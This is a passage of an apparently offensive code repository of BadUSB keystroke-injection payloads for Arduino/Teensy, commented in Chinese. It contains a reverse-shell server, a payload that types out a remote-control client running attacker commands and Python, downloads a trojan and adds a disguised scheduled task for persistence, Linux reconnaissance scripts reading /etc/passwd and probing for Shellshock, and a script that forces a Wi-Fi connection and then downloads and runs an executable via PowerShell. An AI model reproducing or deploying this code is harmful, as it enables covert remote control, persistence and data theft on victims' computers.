Keyboard.println(\"else {\");\n  Keyboard.println(\"$out = $encoding.GetString($outputstream.Read())\");\n  Keyboard.println(\"while($outputstream.Peek() -ne -1){\");\n  Keyboard.println(\"$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}\");\n  Keyboard.println(\"$stream.Write($encoding.GetBytes($out),0,$out.length)\");\n  Keyboard.println(\"$out = $null\");\n  Keyboard.println(\"$string = $null}} else {cleanup}}\");\n  Keyboard.println(\"\"); //Enter to start execution\n\n}\n\nvoid loop() {\n  // put your main code here, to run repeatedly:\n\n}\n"
  },
  {
    "path": "TrojanDownloader/PY_DownLoader/PyShellServer.py",
    "content": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n'''\nPyShell\nPyShell主要用于建立TCP连接，反弹Shell，远程执行命令\n其中Server端为攻击机（远程发送命令），Client端为被控端（接收命令并执行）\n\n'''\n\nimport socket\nimport base64\nimport sys\nimport binascii\nimport os\nimport re\nimport threading\nimport time\nfrom StringIO import StringIO\n\nclass servers:\n\n\t\"\"\" Server of PyShell\n\n\t\tPyShell服务端代码类\n\n\t\"\"\"\n\tdef __init__(self,server_address):\n\t\tself.server_address=server_address\n\t\tself.main()\n\n\tdef connec(self):\n\t\t\"\"\"\n\t\t配置监听参数，包括ip地址，port号，最大链接数量等。\n\t\t\"\"\"\n\t\ttry:\n\t\t\tself.server=socket.socket(socket.AF_INET,socket.SOCK_STREAM) #TCP套接字\n\t\t\tself.server.bind(self.server_address) #ip:port\n\t\t\tself.server.listen(10)\t#设置最大连接数\n\t\t\tprint \"[*]Listening on %s:%d\" % (self.server_address[0],self.server_address[1])\n\t\texcept:\n\t\t\tprint u'参数填写有误,或者该端口已被占用！'\n\n\tdef handle_client(self):\n\t\t\t'''\n\t\t\t从客户端接收数据，并处理。\n\t\t\t'''\n\t\t\trequest=self.client.recv(409600)  #服务器端每次接收的最大数据\n\n\t\t\trequest=base64.b64decode(binascii.a2b_hex(request.strip())).split('*') #将接收到的数据进行解码\n\t\t\tprint request[0]   #输出接收到的数据\n\t\t\t\n\t\t\tpath=request[1]\n\t\t\tcontents=raw_input(path+'>')  #返回当前路径\n\n\t\t\ti='-p'\n\t\t\tif i in contents:\n\t\t\t\tlists=contents.split(' ')\n\t\t\t\tfilename=lists[2]\n\t\t\t\tf=open(filename).read()\n\t\t\t\tcontents='-p'+f\n\n\t\t\tcontents_j=binascii.b2a_hex(base64.b64encode(contents)) #将要发送的数据加码\n\t\t\tself.client.send(contents_j+' ') #发送数据\n\t\t\tself.client.close()\n\n\t\t\tif contents=='kill' or contents=='exit':\n\t\t\t\ttime.sleep(5)\n\t\t\t\tsys.exit()\n\t\n\tdef main(self):\n\t\tself.connec() #执行连接函数\n\t\twhile True:\n\t\t\t'''\n\t\t\t循环接收客户端信息\n\t\t\t'''\n\t\t\ttry:\n\t\t\t\tself.client,self.addr=self.server.accept()  #接收到客户端数据对象，保存到client中，addr中的为客户端ip与端口号\n\t\t\t\tself.handle_client()   #执行接收发送数据函数\n\t\t\texcept:\n\t\t\t\tsys.exit()\n\ndef mains():\n\t'''\n\t从控制台接收参数，执行相应的代码（Server）\n\t'''\n\tif len(sys.argv)>2:\n\t\tip=str(sys.argv[1])\n\t\tport=int(sys.argv[2])\n\n\t\taddress_all=(ip,port)\n\t\tservers(address_all)\n\t\tprint '[HELP]  PyShell.exe [ip] [port]'\n\t\tprint '[HELP]  python PyShellServer.py [ip] [port]'\n\t\tprint u'connection：'\n\t\tprint u'[HELP]  exit    ----退出连接'\n\t\tprint u'[HELP]  kill    ----退出连接并自毁程序'\n\t\tprint u'[HELP]  playtask    ----创建计划任务'\n\t\tprint u'[HELP]  python -p file.py    ----在肉鸡上执行本地python脚本'\n\telse:\n\t\tprint '[HELP]  PyShell.exe [ip] [port]'\n\t\tprint '[HELP]  python PyShellServer.py [ip] [port]'\n\t\tprint u'connection：'\n\t\tprint u'[HELP]  exit    ----退出连接'\n\t\tprint u'[HELP]  kill    ----退出连接并自毁程序'\n\t\tprint u'[HELP]  playtask    ----创建计划任务'\n\t\tprint u'[HELP]  python -p file.py    ----在肉鸡上执行本地python脚本'\n\nif __name__=='__main__':\n\tmains()\n"
  },
  {
    "path": "TrojanDownloader/PY_DownLoader/Py_TrojanWrite(TargetEnvironmentRunPython).ino",
    "content": "void setup() {\n  Keyboard.begin();\n  delay(10000);//延时\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(200); \n  //=========================Run==========================\n  Keyboard.println(\"CMD\");\n  delay(1000);\n \n  Keyboard.println(\"ECHO import socket >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import base64 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import sys >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import binascii >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import os >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import re >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import threading >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import time >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO from StringIO import StringIO >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO import requests >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO class clients: >> PyShell.py\");\n  delay(100); \n  Keyboard.println(\"ECHO \t\"\"\"Client of PythonShell >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\"\"\" >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \tdef __init__(self,client_address): >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tself.client_address=client_address >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tself.main() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \tdef request_client(self): >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t连接服务端 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\ttry: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tpath=os.getcwd() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tself.client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)   #创建一个socket对象 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tself.client.connect(self.client_address)                   #连接服务端 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tself.contents=binascii.b2a_hex(base64.b64encode(self.contents+'*'+path)) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tself.client.send(self.contents) #发送数据 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\texcept: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tsys.exit() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \tdef kill(self): >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tkill project >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tos.popen('kill.bat').read() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \tdef exits(self): >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\texit project >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tos._exit(0) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \tdef response_client(self): >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t客户端处理服务端命令函数 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\ttry: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tresponse=self.client.recv(409600) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\texcept: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tsys.exit() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\telse: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tresponse=base64.b64decode(binascii.a2b_hex(response.strip())) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\ttry: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\tif response=='exit':  #退出当前连接！！ >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\tsys.exit() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\tif response=='kill':  #退出当前连接并自毁程序！！ >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\ttry: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tf=open('kill.bat','w') >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tf.write('ping -n 2 127.0.0.1 >nul\\ndel /F PyShell.exe\\ndel /F kill.bat') >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tf.close() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tthreading.Thread(target=self.kill).start() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\ttime.sleep(0.5) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tthreading.Thread(target=self.exits).start() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\texcept: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tpass >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\tif response=='playtask':        #给自己创建计划任务！ >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\ttry: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tpath=os.getcwd() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tname=os.popen('whoami').read().split('\\\\')[1].replace('\\n','')  #获取当前用户名称 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tcommand='schtasks.exe  /Create /RU '+'\"'+name+'\"'+' /SC MINUTE /MO 30 /TN FIREWALL /TR '+'\"'+path+\\'\\\\PyShell.exe\\'+'\"'+' /ED 2016/12/12'#可执行文件一定要写绝对路径  >> PyShell.py\");\n  delay(100); \n  Keyboard.println(\"ECHO \t\t\t\t\t\t#以上这条为添加一条计划任务的命令！！！ >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tself.contents=os.popen(command).read() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\texcept: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tpass >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\telse: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\ti='-p' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\tif i in response: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tlists=response.split('-p') >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tresponse=lists[1] >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tsys.stdout=result=StringIO() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\texec(response)                      #执行python脚本文件 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tself.contents=result.getvalue() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\telse: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tself.contents=response.split('cd ') >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tm=re.search(self.res,response) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tif m: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\t\tm=m.group() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\telse: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\t\tm='.' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\tif len(self.contents)>1: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\t\tos.chdir(self.contents[1].strip())          #切换目录，popen('cd ../')只能切换子目录，父目录改不了 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\t\tself.contents=' ' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\telse: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\t\tself.contents=os.popen(self.contents[0]).read()   #执行普通的cmd命令 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\t\t\t\tos.chdir(m) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\texcept: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\tself.contents=' ' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\t\tpass >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tself.client.close() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \tdef main(self): >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tself.contents=' ' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tself.res=r'[A-Za-z]:' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\twhile True: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tself.request_client() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\t\tself.response_client() >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO def mains(): >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t从控制台接收参数，执行相应的代码（Client or Server） >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t''' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \turl = 'https://www.youtube.com/watch?v=aDwCCUfNFug'    //自定义下载木马网址 >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO     r = requests.get(url) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO     with open('PyShell.exe', 'wb') as f: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         f.write(r.content) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \tif len(sys.argv)>2: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tip=str(sys.argv[1]) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tport=int(sys.argv[2]) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\taddress_all=(ip,port) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tclients(address_all) >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         print '[HELP]  PyShell.exe [ip] [port]' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         print '[HELP]  python PyShell.py [ip] [port]' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         print u'connection：' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         print u'[HELP]  exit    ----退出连接' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         print u'[HELP]  kill    ----退出连接并自毁程序' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         print u'[HELP]  playtask    ----创建计划任务' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO         print u'[HELP]  python -p file.py    ----在肉鸡上执行本地python脚本' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \telse: >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tprint '[HELP]  PyShell.exe [ip] [port]' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tprint '[HELP]  python PyShell.py [ip] [port]' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tprint u'connection：' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tprint u'[HELP]  exit    ----退出连接' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tprint u'[HELP]  kill    ----退出连接并自毁程序' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tprint u'[HELP]  playtask    ----创建计划任务' >> PyShell.py\");\n  delay(100);\n  Keyboard.println(\"ECHO \t\tprint u'[HELP]  python -p file.py    ----在肉鸡上执行本地python脚本' >> PyShell.py\");\n  delay(100);\n\n  Keyboard.println(\"python PyShell.py [ip] [port]\");  //输入自己的IP及端口，在攻击者电脑上执行服务器脚本，等待目标连接\n  delay(2000);\n    Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  delay(200);\n  Keyboard.println('CMD');\n  delay(600);\n  Keyboard.println('EXIT');\n  //======================================================\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\n\nvoid loop() {\n}\n"
  },
  {
    "path": "Ubuntu_InformationGathering/BasicTerminalCommandsForUbuntu(Display).ino",
    "content": "//Ubuntu的基本终端命令\nvoid setup() {\n  Keyboard.begin();\n  delay(3000);//延时\n  Keyboard.press(KEY_LEFT_ALT);\n  delay(200); \n  Keyboard.press(KEY_F2);\n  delay(200); \n  Keyboard.release(KEY_LEFT_ALT);\n  Keyboard.release(KEY_F2);\n  delay(500);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(200); \n  //=========================Run==========================\n  Keyboard.println(\"XTERM\");\n  delay(500);\n  Keyboard.println();\n  delay(750);\n  Keyboard.print(\"PWD\");\n  delay(500);\n  Keyboard.println();\n  delay(300);\n  Keyboard.print(\"ID\");\n  delay(300);\n  Keyboard.println();\n  delay(500);\n  Keyboard.print(\"CAT /ETC/PASSWD\")\n  delay(500);\n  Keyboard.println();\n  //======================================================\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\n\nvoid loop() {\n}\n"
  },
  {
    "path": "Ubuntu_InformationGathering/UbuntuInformationCollectionTXT_File(Information).ino",
    "content": "//信息收集\n//启用Ubuntu终端搜集操作系统信息\nvoid setup() {\n  Keyboard.begin();\n  delay(3000);\n  Keyboard.press(KEY_LEFT_ALT);\n  delay(200); \n  Keyboard.press(KEY_F2);\n  delay(200); \n  Keyboard.release(KEY_LEFT_ALT);\n  Keyboard.release(KEY_F2);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(200); \n  //=========================Run==========================\n  Keyboard.print(\"GNOME-TERMINAL\");\n  delay(100);\n  Keyboard.println();\n  delay(200);\n  Keyboard.print(\"CLEAR\");\n  delay(10);\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"ECHO \\\"lOGGED IN USER:\\\" $user > INFO_GATHERING.TXT\");\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"ECHO >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"ECHO 0N \\\"dISTRIBUTION kERNEL vERSION:\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"CAT /ETC/ISSUE | CUT -C1-13 >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"ECHO -N \\\"UNAME RESULTS: \\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"UNAME -A >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(100);\n  Keyboard.print(\"ECHO >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"ECHO \\\"sHELLSOCK bUG vULNERABILITY\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  Keyboard.print(\"ECHO >> INFO_GATHERING.TXT\");\n  Keyboard.println();\n  delay(50);\n  Keyboard.print(\"ENV X='() { :;};ECHO VULNERABLE' BASH -C `ECHO HELLO` >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(100);\n  Keyboard.println();\n  delay(100);\n  Keyboard.print(\"ECHO >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(50);\n  Keyboard.println(\"ECHO \\\"mOUNTED FILESYSTEMS\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"MOUNT -L >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(100);\n  Keyboard.println(\"ECHO >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.print(\"ECHO \\\"nETWORK cONFIGURATION\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(50);\n  Keyboard.println(\"IFCONFIG -A | GREP 'lINK\\\\|INET' >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO \\\"pRINT hOSTS\\\" >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"CAT /ETC/HOSTS >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO ECHO \\\"pRINT arp\\\" >>  INFO_GATHERING.TXT\");\n  delay(50); \n  Keyboard.println(\"ARP >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO \\\"dEVELOPMENT TOOLS AVAILABILITY\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"WHICH GCC >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"WHICH G++ >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"WHICH PYTHON >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO \\\"pRINT tcp/UDP lISTENING sERVICES\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"NETSTAT -TUNLPE >> INFO_GATHERING.TXT\");\n  delay(300);\n  Keyboard.println(\"ECHO >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.print(\"ECHO \\\"iNSTALLED pACKAGES\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  delay(200);\n  Keyboard.println(\"DPKG -L >> INFO_GATHERING.TXT\");\n  delay(300);\n  Keyboard.println(\"ECHO >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"ECHO \\\"fIND rEADABLE fOLDERS IN /ETC\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"FIND /ETC -USER `ID -U` -PERM -U=R -O -GROUP `ID -G` -PERM -G=R -O -PERM -O=R -LS 2> /DEV/NULL >>  INFO_GATHERING.TXT\");\n  delay(500);\n  Keyboard.println(\"ECHO >>  INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println(\"\\\"fIND suid AND guid FILES\\\" >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.print(\"FIND / -TYPE F -PERM -U=S -O -TYPE F -PERM -G=S -LS 2>/DEV/NULL >> INFO_GATHERING.TXT\");\n  delay(50);\n  Keyboard.println();\n  //======================================================\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();\n}\n\nvoid loop() {\n}\n"
  },
  {
    "path": "WiFi_ConnectionTrojan/ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino",
    "content": "#define BOARDTYPE\n#ifdef TEENSY2\n    #include<usb_private.h>\n#endif\n\n\n\nvoid setup(){\n  \n  delay(3000);\n  wait_for_drivers(2000);\n\n  minimise_windows();\n  delay(500);\n  while(!cmd(3,500,\"cmd /T:01 /K \\\"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\\\"\"))\n  {\n  reset_windows_desktop(2000);\n  }\n\n  Keyboard.println(\"echo ^<?xml version=\\\"1.0\\\"?^> > %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<WLANProfile xmlns=\\\"http://www.microsoft.com/networking/WLAN/profile/v1\\\"^> >> %TEMP%\\\\pl.xml \");  //强迫连接WIFI热点，并下载psl木马\n  Keyboard.println(\"echo ^<name^>INPUT0^</name^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<SSIDConfig^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<SSID^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<hex^>INPUT1^</hex^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<name^>INPUT0^</name^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^</SSID^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^</SSIDConfig^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<connectionType^>ESS^</connectionType^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<connectionMode^>auto^</connectionMode^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<MSM^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<security^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<authEncryption^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<authentication^>WPA2PSK^</authentication^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<encryption^>AES^</encryption^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<useOneX^>false^</useOneX^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^</authEncryption^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<sharedKey^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<keyType^>passPhrase^</keyType^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<protected^>false^</protected^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^<keyMaterial^>INPUT2^</keyMaterial^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^</sharedKey^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^</security^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^</MSM^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"echo ^</WLANProfile^> >> %TEMP%\\\\pl.xml \");\n  Keyboard.println(\"netsh wlan add profile filename=%TEMP%\\\\pl.xml \");\n  delay(2000);\n  Keyboard.println(\"netsh wlan connect name=INPUT0 \");\n  delay(3000);\n  Keyboard.println(\"echo $wc = New-Object System.Net.WebClient > %temp%\\\\dl.ps1\");\n  Keyboard.println(\"echo $url = \\\"INPUT3\\\" >> %temp%\\\\dl.ps1\");\n  Keyboard.println(\"echo [string]$hex = $wc.DownloadString($url) >> %temp%\\\\dl.ps1\");\n  Keyboard.println(\"echo [Byte[]] $temp = $hex -split ' ' >> %temp%\\\\dl.ps1\");\n  Keyboard.println(\"echo [System.IO.File]::WriteAllBytes(\\\"%TEMP%\\\\svcfw.exe\\\", $temp) >> %temp%\\\\dl.ps1\");\n  Keyboard.println(\"echo start-process -nonewwindow \\\"%TEMP%\\\\svcfw.exe\\\" >> %temp%\\\\dl.ps1\");\n   \n  delay(2000);\n  \n  Keyboard.println(\"echo Set oShell = 